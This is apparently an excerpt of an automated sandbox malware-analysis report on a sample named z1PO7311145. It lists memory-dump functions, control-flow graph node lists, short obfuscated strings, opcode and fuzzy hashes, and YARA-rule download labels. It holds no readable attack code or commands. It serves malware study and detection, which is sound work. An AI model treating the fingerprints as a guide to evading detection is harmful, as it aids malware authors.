                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (oq$(oq$(oq$,q$,q
                                                                                      • API String ID: 0-189141485
                                                                                      • Opcode ID: 77a0daeb042d9f360f101ab606a84b0daf5860e87ed8b4ae060492397fa19162
                                                                                      • Instruction ID: 71b565a8db049c10008088b4304de0ff270e8df4312d9313d1ef60f1c3e23284
                                                                                      • Opcode Fuzzy Hash: 77a0daeb042d9f360f101ab606a84b0daf5860e87ed8b4ae060492397fa19162
                                                                                      • Instruction Fuzzy Hash: D3E1F571A002199FEB15CFA9D8A4EADFBF2BF88304F558065E855AB365D730EC41CB50
                                                                                      Function 02DA29EC Relevance: 5.5, Strings: 4, Instructions: 487COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 364 2da29ec-2da29f6 366 2da29f8-2da2a3b 364->366 367 2da2981-2da2999 364->367 373 2da2a5d-2da2aac 366->373 374 2da2a3d-2da2a5c 366->374 370 2da29a0-2da29c8 367->370 378 2da2aae-2da2ab5 373->378 379 2da2ac7-2da2acf 373->379 380 2da2abe-2da2ac5 378->380 381 2da2ab7-2da2abc 378->381 382 2da2ad2-2da2ae6 379->382 380->382 381->382 385 2da2ae8-2da2aef 382->385 386 2da2afc-2da2b04 382->386 387 2da2af1-2da2af3 385->387 388 2da2af5-2da2afa 385->388 389 2da2b06-2da2b0a 386->389 387->389 388->389 391 2da2b6a-2da2b6d 389->391 392 2da2b0c-2da2b21 389->392 393 2da2b6f-2da2b84 391->393 394 2da2bb5-2da2bbb 391->394 392->391 399 2da2b23-2da2b26 392->399 393->394 401 2da2b86-2da2b8a 393->401 396 2da2bc1-2da2bc3 394->396 397 2da36b6 394->397 396->397 400 2da2bc9-2da2bce 396->400 404 2da36bb-2da3700 397->404 402 2da2b28-2da2b2a 399->402 403 2da2b45-2da2b63 call 2da02c8 399->403 405 2da3664-2da3668 400->405 406 2da2bd4 400->406 409 2da2b8c-2da2b90 401->409 410 2da2b92-2da2bb0 call 2da02c8 401->410 402->403 411 2da2b2c-2da2b2f 402->411 403->391 422 2da372e-2da3874 404->422 423 2da3702-2da3728 404->423 407 2da366a-2da366d 405->407 408 2da366f-2da36b5 405->408 406->405 407->404 407->408 409->394 409->410 410->394 411->391 414 2da2b31-2da2b43 411->414 414->391 414->403 426 2da38a6-2da38a9 422->426 427 2da3876-2da3878 422->427 423->422 429 2da38aa-2da38bc 426->429 427->429 430 2da387a-2da38a3 427->430 432 2da38ee-2da38f4 429->432 433 2da38be-2da38eb 429->433 430->426 435 2da3928-2da3937 432->435 436 2da38f6-2da3908 432->436 433->432 437 2da393a-2da393d 435->437 436->437 439 2da390a-2da390c 436->439 440 2da393e-2da3941 437->440 439->440 441 2da390e-2da3910 439->441 442 2da3942-2da39e8 440->442 441->442 443 2da3912-2da3927 441->443 443->435
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xq$Xq$Xq$Xq
                                                                                      • API String ID: 0-3965792415
                                                                                      • Opcode ID: f64ba9e5430b27c19a18570a102ab845c32936e8967e048f1184f1afa361c8ce
                                                                                      • Instruction ID: bb32736cae41da0e67ddbc5416b0963e708f92c5e09d433e6084974a0c88cdf9
                                                                                      • Opcode Fuzzy Hash: f64ba9e5430b27c19a18570a102ab845c32936e8967e048f1184f1afa361c8ce
                                                                                      • Instruction Fuzzy Hash: F8F1D6319047968FDB924F7A84647DABFB2FF8B318B0945F9C8C55A601CB345C5ACB50
                                                                                      Function 06B35028 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N
                                                                                      • API String ID: 0-1130791706
                                                                                      • Opcode ID: c53cbdf9b0a085ccbf5dfa2e0ecdc71a783e89a4993fd4a1783daad9af3ae6a8
                                                                                      • Instruction ID: dc082e61890c88ace55cadfdc2d5c40d98be401a7c70c9c9c3b59330e98b5dd9
                                                                                      • Opcode Fuzzy Hash: c53cbdf9b0a085ccbf5dfa2e0ecdc71a783e89a4993fd4a1783daad9af3ae6a8
                                                                                      • Instruction Fuzzy Hash: 2973F571D1075A8EDB11EF68C844A99FBB1FF99300F15D6DAE44867221EB70AAC4CF81
                                                                                      Function 06B39C70 Relevance: 3.5, Strings: 1, Instructions: 2230COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: K
                                                                                      • API String ID: 0-856455061
                                                                                      • Opcode ID: 0314b04afdda5cfa2cd2be5bda76ec6f3a1a03a4f0a11c1b3046fa14ab19843b
                                                                                      • Instruction ID: aa7a5e6609f64b1bf8fd960d8fdc4f7de9b1e6430636aab69109194cd1311f34
                                                                                      • Opcode Fuzzy Hash: 0314b04afdda5cfa2cd2be5bda76ec6f3a1a03a4f0a11c1b3046fa14ab19843b
                                                                                      • Instruction Fuzzy Hash: ED33F271D146298EDB51EF68C884A9DF7B1FF99300F10D2DAD4486B261EB70AAC4CF81
                                                                                      Function 02DAA088 Relevance: 3.4, Strings: 2, Instructions: 894COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (oq$4'q
                                                                                      • API String ID: 0-1336004174
                                                                                      • Opcode ID: f91e198ec26995cbd94568f02512a1bb1bdaffe5e50e70e0d5bb3e771f16f33b
                                                                                      • Instruction ID: 2a0c80cab20052e3a8b64634d222f88d53bf55ca1e2aa1a197e268628002643a
                                                                                      • Opcode Fuzzy Hash: f91e198ec26995cbd94568f02512a1bb1bdaffe5e50e70e0d5bb3e771f16f33b
                                                                                      • Instruction Fuzzy Hash: 9D825B71A00209DFCB15CFA8C5A4EAEBBF2BF88314F158669E8069B365D731ED41CB51
                                                                                      Function 02DA69B0 Relevance: 3.1, Strings: 2, Instructions: 563COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1840 2da69b0-2da69e6 1841 2da69ec-2da69fa 1840->1841 1842 2da6fb1-2da700c call 2da7118 1840->1842 1845 2da6a28-2da6a39 1841->1845 1846 2da69fc-2da6a0d 1841->1846 1853 2da700e-2da7012 1842->1853 1854 2da705c-2da7060 1842->1854 1847 2da6aaa-2da6abe 1845->1847 1848 2da6a3b-2da6a3f 1845->1848 1846->1845 1855 2da6a0f-2da6a1b 1846->1855 1982 2da6ac1 call 2da69b0 1847->1982 1983 2da6ac1 call 2da69a0 1847->1983 1851 2da6a5a-2da6a63 1848->1851 1852 2da6a41-2da6a4d 1848->1852 1861 2da6a69-2da6a6c 1851->1861 1862 2da6d6c 1851->1862 1859 2da6ddb-2da6e26 1852->1859 1860 2da6a53-2da6a55 1852->1860 1863 2da7021-2da7028 1853->1863 1864 2da7014-2da7019 1853->1864 1857 2da7062-2da7071 1854->1857 1858 2da7077-2da708b 1854->1858 1867 2da6d71-2da6dd4 1855->1867 1868 2da6a21-2da6a23 1855->1868 1856 2da6ac7-2da6acd 1869 2da6acf-2da6ad1 1856->1869 1870 2da6ad6-2da6add 1856->1870 1871 2da709d-2da70a7 1857->1871 1872 2da7073-2da7075 1857->1872 1984 2da708d call 2daa0e8 1858->1984 1985 2da708d call 2daa088 1858->1985 1986 2da708d call 2da9dd0 1858->1986 1936 2da6e2d-2da6eac 1859->1936 1873 2da6d62-2da6d69 1860->1873 1861->1862 1874 2da6a72-2da6a91 1861->1874 1862->1867 1865 2da70fe-2da7113 1863->1865 1866 2da702e-2da7035 1863->1866 1864->1863 1866->1854 1878 2da7037-2da703b 1866->1878 1867->1859 1868->1873 1869->1873 1876 2da6bcb-2da6bdc 1870->1876 1877 2da6ae3-2da6afa 1870->1877 1880 2da70a9-2da70af 1871->1880 1881 2da70b1-2da70b5 1871->1881 1879 2da7093-2da709a 1872->1879 1874->1862 1899 2da6a97-2da6a9d 1874->1899 1896 2da6bde-2da6beb 1876->1896 1897 2da6c06-2da6c0c 1876->1897 1877->1876 1898 2da6b00-2da6b0c 1877->1898 1885 2da704a-2da7051 1878->1885 1886 2da703d-2da7042 1878->1886 1882 2da70bd-2da70f7 1880->1882 1881->1882 1883 2da70b7 1881->1883 1882->1865 1883->1882 1885->1865 1892 2da7057-2da705a 1885->1892 1886->1885 1892->1879 1902 2da6c27-2da6c2d 1896->1902 1914 2da6bed-2da6bf9 1896->1914 1901 2da6c0e-2da6c1a 1897->1901 1897->1902 1903 2da6b12-2da6b7e 1898->1903 1904 2da6bc4-2da6bc6 1898->1904 1899->1842 1906 2da6aa3-2da6aa7 1899->1906 1909 2da6ec3-2da6f26 1901->1909 1910 2da6c20-2da6c22 1901->1910 1911 2da6d5f 1902->1911 1912 2da6c33-2da6c50 1902->1912 1939 2da6bac-2da6bc1 1903->1939 1940 2da6b80-2da6baa 1903->1940 1904->1873 1906->1847 1962 2da6f2d-2da6fac 1909->1962 1910->1873 1911->1873 1912->1862 1930 2da6c56-2da6c59 1912->1930 1919 2da6bff-2da6c01 1914->1919 1920 2da6eb1-2da6ebc 1914->1920 1919->1873 1920->1909 1930->1842 1932 2da6c5f-2da6c85 1930->1932 1932->1911 1944 2da6c8b-2da6c97 1932->1944 1939->1904 1940->1939 1946 2da6d5b-2da6d5d 1944->1946 1947 2da6c9d-2da6d15 1944->1947 1946->1873 1965 2da6d43-2da6d58 1947->1965 1966 2da6d17-2da6d41 1947->1966 1965->1946 1966->1965 1982->1856 1983->1856 1984->1879 1985->1879 1986->1879
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (oq$Hq
                                                                                      • API String ID: 0-2917151738
                                                                                      • Opcode ID: 0c2a87d387bed2f61f992e498b2b60c0a35b3f64d2b74954c872d55eba3c75a4
                                                                                      • Instruction ID: 6470292c1dccf5976986a8b4c22b185d627b2f52a800b4032e176e91d163fc8a
                                                                                      • Opcode Fuzzy Hash: 0c2a87d387bed2f61f992e498b2b60c0a35b3f64d2b74954c872d55eba3c75a4
                                                                                      • Instruction Fuzzy Hash: 52225D70A002199FDB14DF69C864BAEBBBABF88340F148569E906DB395DF34DD41CB90
                                                                                      Function 02DAC148 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2069 2dac148-2dac158 2070 2dac15a-2dac172 2069->2070 2071 2dac184 2069->2071 2075 2dac17b-2dac17e 2070->2075 2076 2dac174-2dac179 2070->2076 2072 2dac186-2dac18a 2071->2072 2077 2dac18b-2dac199 2075->2077 2078 2dac180-2dac182 2075->2078 2076->2072 2080 2dac19b-2dac1a1 2077->2080 2081 2dac1d2-2dac1d9 2077->2081 2078->2070 2078->2071 2082 2dac1da-2dac2ac call 2da41a0 call 2da3cc0 2080->2082 2083 2dac1a3-2dac1c8 2080->2083 2081->2082 2095 2dac2ae 2082->2095 2096 2dac2b3-2dac2d4 call 2da5658 2082->2096 2084 2dac1ca 2083->2084 2085 2dac1cf-2dac1d1 2083->2085 2084->2085 2085->2081 2095->2096 2098 2dac2d9-2dac2e4 2096->2098 2099 2dac2eb-2dac2ef 2098->2099 2100 2dac2e6 2098->2100 2101 2dac2f1-2dac2f2 2099->2101 2102 2dac2f4-2dac2fb 2099->2102 2100->2099 2103 2dac313-2dac357 2101->2103 2104 2dac2fd 2102->2104 2105 2dac302-2dac310 2102->2105 2109 2dac3bd-2dac3d4 2103->2109 2104->2105 2105->2103 2111 2dac359-2dac36f 2109->2111 2112 2dac3d6-2dac3fb 2109->2112 2116 2dac399 2111->2116 2117 2dac371-2dac37d 2111->2117 2119 2dac3fd-2dac412 2112->2119 2120 2dac413 2112->2120 2118 2dac39f-2dac3bc 2116->2118 2121 2dac37f-2dac385 2117->2121 2122 2dac387-2dac38d 2117->2122 2118->2109 2119->2120 2123 2dac397 2121->2123 2122->2123 2123->2118
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: fc8e5c17743d2d5cddefe1715b1ffe0ba26c78386b4355a55b7769df94eb4059
                                                                                      • Instruction ID: 387cf75ee6ced5e36ad84f599464e12c567b37f45eee1d0d5b0a6a9e5ed33d41
                                                                                      • Opcode Fuzzy Hash: fc8e5c17743d2d5cddefe1715b1ffe0ba26c78386b4355a55b7769df94eb4059
                                                                                      • Instruction Fuzzy Hash: 88A1D575E10218DFEB14DFAAD894A9DBBF2BF89310F14806AE449AB365DB309C41CF54
                                                                                      Function 02DA5362 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2127 2da5362-2da5364 2128 2da5366-2da53a0 2127->2128 2129 2da53c4-2da5484 call 2da41a0 call 2da3cc0 2127->2129 2130 2da53a2 2128->2130 2131 2da53a7-2da53c2 2128->2131 2141 2da548b-2da54a9 2129->2141 2142 2da5486 2129->2142 2130->2131 2131->2129 2172 2da54ac call 2da5658 2141->2172 2173 2da54ac call 2da5649 2141->2173 2142->2141 2143 2da54b2-2da54bd 2144 2da54bf 2143->2144 2145 2da54c4-2da54c8 2143->2145 2144->2145 2146 2da54ca-2da54cb 2145->2146 2147 2da54cd-2da54d4 2145->2147 2148 2da54ec-2da5530 2146->2148 2149 2da54db-2da54e9 2147->2149 2150 2da54d6 2147->2150 2154 2da5596-2da55ad 2148->2154 2149->2148 2150->2149 2156 2da55af-2da55d4 2154->2156 2157 2da5532-2da5548 2154->2157 2163 2da55ec 2156->2163 2164 2da55d6-2da55eb 2156->2164 2161 2da554a-2da5556 2157->2161 2162 2da5572 2157->2162 2165 2da5558-2da555e 2161->2165 2166 2da5560-2da5566 2161->2166 2167 2da5578-2da5595 2162->2167 2164->2163 2168 2da5570 2165->2168 2166->2168 2167->2154 2168->2167 2172->2143 2173->2143
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: c564bd322dffc8189bd2368f1145a293de697861e9e73979518064eb3ad66276
                                                                                      • Instruction ID: ccfe758500d84e4627bd8b9048f2448610ccc02c70862337257254dad2d23365
                                                                                      • Opcode Fuzzy Hash: c564bd322dffc8189bd2368f1145a293de697861e9e73979518064eb3ad66276
                                                                                      • Instruction Fuzzy Hash: DA91B074E00218CFEB14DFAAD994A9DBBF2BF88300F549069E809AB365DB709D45CF10
                                                                                      Function 02DAC468 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2174 2dac468-2dac498 2175 2dac49a 2174->2175 2176 2dac49f-2dac57c call 2da41a0 call 2da3cc0 2174->2176 2175->2176 2186 2dac57e 2176->2186 2187 2dac583-2dac5a4 call 2da5658 2176->2187 2186->2187 2189 2dac5a9-2dac5b4 2187->2189 2190 2dac5bb-2dac5bf 2189->2190 2191 2dac5b6 2189->2191 2192 2dac5c1-2dac5c2 2190->2192 2193 2dac5c4-2dac5cb 2190->2193 2191->2190 2194 2dac5e3-2dac627 2192->2194 2195 2dac5cd 2193->2195 2196 2dac5d2-2dac5e0 2193->2196 2200 2dac68d-2dac6a4 2194->2200 2195->2196 2196->2194 2202 2dac629-2dac63f 2200->2202 2203 2dac6a6-2dac6cb 2200->2203 2207 2dac669 2202->2207 2208 2dac641-2dac64d 2202->2208 2209 2dac6cd-2dac6e2 2203->2209 2210 2dac6e3 2203->2210 2213 2dac66f-2dac68c 2207->2213 2211 2dac64f-2dac655 2208->2211 2212 2dac657-2dac65d 2208->2212 2209->2210 2214 2dac667 2211->2214 2212->2214 2213->2200 2214->2213
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: 455ef1c9ffcfc3dcf53a1869d1adea97ce3ddcbbb4bed491e2df807ff443d009
                                                                                      • Instruction ID: db5ff1593850128b6b47de26dbef10b0911ff5f8e9a99f1c33d2cb72c0ff61e4
                                                                                      • Opcode Fuzzy Hash: 455ef1c9ffcfc3dcf53a1869d1adea97ce3ddcbbb4bed491e2df807ff443d009
                                                                                      • Instruction Fuzzy Hash: B781B174E00258CFEB14DFAAD994B9DBBF2BF88310F14916AE419AB365DB309941CF50
                                                                                      Function 02DACA08 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2218 2daca08-2daca38 2220 2daca3a 2218->2220 2221 2daca3f-2dacb1c call 2da41a0 call 2da3cc0 2218->2221 2220->2221 2231 2dacb1e 2221->2231 2232 2dacb23-2dacb44 call 2da5658 2221->2232 2231->2232 2234 2dacb49-2dacb54 2232->2234 2235 2dacb5b-2dacb5f 2234->2235 2236 2dacb56 2234->2236 2237 2dacb61-2dacb62 2235->2237 2238 2dacb64-2dacb6b 2235->2238 2236->2235 2241 2dacb83-2dacbc7 2237->2241 2239 2dacb6d 2238->2239 2240 2dacb72-2dacb80 2238->2240 2239->2240 2240->2241 2245 2dacc2d-2dacc44 2241->2245 2247 2dacbc9-2dacbdf 2245->2247 2248 2dacc46-2dacc6b 2245->2248 2252 2dacc09 2247->2252 2253 2dacbe1-2dacbed 2247->2253 2255 2dacc6d-2dacc82 2248->2255 2256 2dacc83 2248->2256 2254 2dacc0f-2dacc2c 2252->2254 2257 2dacbef-2dacbf5 2253->2257 2258 2dacbf7-2dacbfd 2253->2258 2254->2245 2255->2256 2259 2dacc07 2257->2259 2258->2259 2259->2254
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: 77452e8bade71c7c8077d85e86c0689d6e2114f456a1738d3b2b5961af03363f
                                                                                      • Instruction ID: 52d53aafaee6a31c7bc8030d075a97c2b3dabdc7769c380caed5e85b1032263e
                                                                                      • Opcode Fuzzy Hash: 77452e8bade71c7c8077d85e86c0689d6e2114f456a1738d3b2b5961af03363f
                                                                                      • Instruction Fuzzy Hash: AE81A174E11218CFEB54DFAAD894A9DBBF2BF88310F14C06AD819AB365DB319941CF50
                                                                                      Function 02DAD278 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2307 2dad278-2dad2a8 2308 2dad2aa 2307->2308 2309 2dad2af-2dad38c call 2da41a0 call 2da3cc0 2307->2309 2308->2309 2319 2dad38e 2309->2319 2320 2dad393-2dad3b4 call 2da5658 2309->2320 2319->2320 2322 2dad3b9-2dad3c4 2320->2322 2323 2dad3cb-2dad3cf 2322->2323 2324 2dad3c6 2322->2324 2325 2dad3d1-2dad3d2 2323->2325 2326 2dad3d4-2dad3db 2323->2326 2324->2323 2327 2dad3f3-2dad437 2325->2327 2328 2dad3dd 2326->2328 2329 2dad3e2-2dad3f0 2326->2329 2333 2dad49d-2dad4b4 2327->2333 2328->2329 2329->2327 2335 2dad439-2dad44f 2333->2335 2336 2dad4b6-2dad4db 2333->2336 2340 2dad479 2335->2340 2341 2dad451-2dad45d 2335->2341 2342 2dad4dd-2dad4f2 2336->2342 2343 2dad4f3 2336->2343 2346 2dad47f-2dad49c 2340->2346 2344 2dad45f-2dad465 2341->2344 2345 2dad467-2dad46d 2341->2345 2342->2343 2347 2dad477 2344->2347 2345->2347 2346->2333 2347->2346
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: e10179ecfe3ae3a8ebe3c854009cdb77ea62e1e144c6ceedbc1551062d977ff3
                                                                                      • Instruction ID: a7a9f6750c90afe1ac8958c87fa1ad2b6105aac37dc4f1fc1eeb9a33f2115172
                                                                                      • Opcode Fuzzy Hash: e10179ecfe3ae3a8ebe3c854009cdb77ea62e1e144c6ceedbc1551062d977ff3
                                                                                      • Instruction Fuzzy Hash: 8581A274E01218CFEB58DFAAD894A9DBBF2BF88300F14C069E449AB365DB709945CF10
                                                                                      Function 02DACCD8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2263 2daccd8-2dacd08 2264 2dacd0a 2263->2264 2265 2dacd0f-2dacdec call 2da41a0 call 2da3cc0 2263->2265 2264->2265 2275 2dacdee 2265->2275 2276 2dacdf3-2dace14 call 2da5658 2265->2276 2275->2276 2278 2dace19-2dace24 2276->2278 2279 2dace2b-2dace2f 2278->2279 2280 2dace26 2278->2280 2281 2dace31-2dace32 2279->2281 2282 2dace34-2dace3b 2279->2282 2280->2279 2283 2dace53-2dace97 2281->2283 2284 2dace3d 2282->2284 2285 2dace42-2dace50 2282->2285 2289 2dacefd-2dacf14 2283->2289 2284->2285 2285->2283 2291 2dace99-2daceaf 2289->2291 2292 2dacf16-2dacf3b 2289->2292 2296 2daced9 2291->2296 2297 2daceb1-2dacebd 2291->2297 2298 2dacf3d-2dacf52 2292->2298 2299 2dacf53 2292->2299 2302 2dacedf-2dacefc 2296->2302 2300 2dacebf-2dacec5 2297->2300 2301 2dacec7-2dacecd 2297->2301 2298->2299 2303 2daced7 2300->2303 2301->2303 2302->2289 2303->2302
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: 1aa4d3b5266bd2d09f9b9a78b6a64cbcb22d85b95843776d87cbb0422336040f
                                                                                      • Instruction ID: 531c9d9ed6ceda9e87d46af0f294cbad72eb32bf52a1514badeb1999a71b518b
                                                                                      • Opcode Fuzzy Hash: 1aa4d3b5266bd2d09f9b9a78b6a64cbcb22d85b95843776d87cbb0422336040f
                                                                                      • Instruction Fuzzy Hash: 9C81A174E10218DFEB54DFAAD894A9DBBF2BF88310F14806AD419AB365DB309D41CF50
                                                                                      Function 02DAC738 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2351 2dac738-2dac768 2352 2dac76a 2351->2352 2353 2dac76f-2dac84c call 2da41a0 call 2da3cc0 2351->2353 2352->2353 2363 2dac84e 2353->2363 2364 2dac853-2dac874 call 2da5658 2353->2364 2363->2364 2366 2dac879-2dac884 2364->2366 2367 2dac88b-2dac88f 2366->2367 2368 2dac886 2366->2368 2369 2dac891-2dac892 2367->2369 2370 2dac894-2dac89b 2367->2370 2368->2367 2371 2dac8b3-2dac8f7 2369->2371 2372 2dac89d 2370->2372 2373 2dac8a2-2dac8b0 2370->2373 2377 2dac95d-2dac974 2371->2377 2372->2373 2373->2371 2379 2dac8f9-2dac90f 2377->2379 2380 2dac976-2dac99b 2377->2380 2384 2dac939 2379->2384 2385 2dac911-2dac91d 2379->2385 2386 2dac99d-2dac9b2 2380->2386 2387 2dac9b3 2380->2387 2390 2dac93f-2dac95c 2384->2390 2388 2dac91f-2dac925 2385->2388 2389 2dac927-2dac92d 2385->2389 2386->2387 2391 2dac937 2388->2391 2389->2391 2390->2377 2391->2390
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: ceadd4d534f20dbceb77e83965e6574589af0bbcbe58db36d6a1dc688b4a800a
                                                                                      • Instruction ID: d79825a15f86a71c32cd5e5ec361c494f04a383d91f3c5a7cd0206d843ba9658
                                                                                      • Opcode Fuzzy Hash: ceadd4d534f20dbceb77e83965e6574589af0bbcbe58db36d6a1dc688b4a800a
                                                                                      • Instruction Fuzzy Hash: 51819074E10218DFEB14DFAAD994B9DBBF2BF88310F14806AD859AB365DB309941CF50
                                                                                      Function 02DACFAA Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: 0a20e54c11fb1febb318449c59b90f0a2699ad7d2451d997694ad10a3c33ce1a
                                                                                      • Instruction ID: cecd1730e583147e1c81f5fbebb7af2724a829c8837af336d4c80bd0cc26830a
                                                                                      • Opcode Fuzzy Hash: 0a20e54c11fb1febb318449c59b90f0a2699ad7d2451d997694ad10a3c33ce1a
                                                                                      • Instruction Fuzzy Hash: DE819074E01218CFEB54DFAAD994A9DBBF2BF88300F14D069E819AB365DB309941CF10
                                                                                      Function 06B39548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
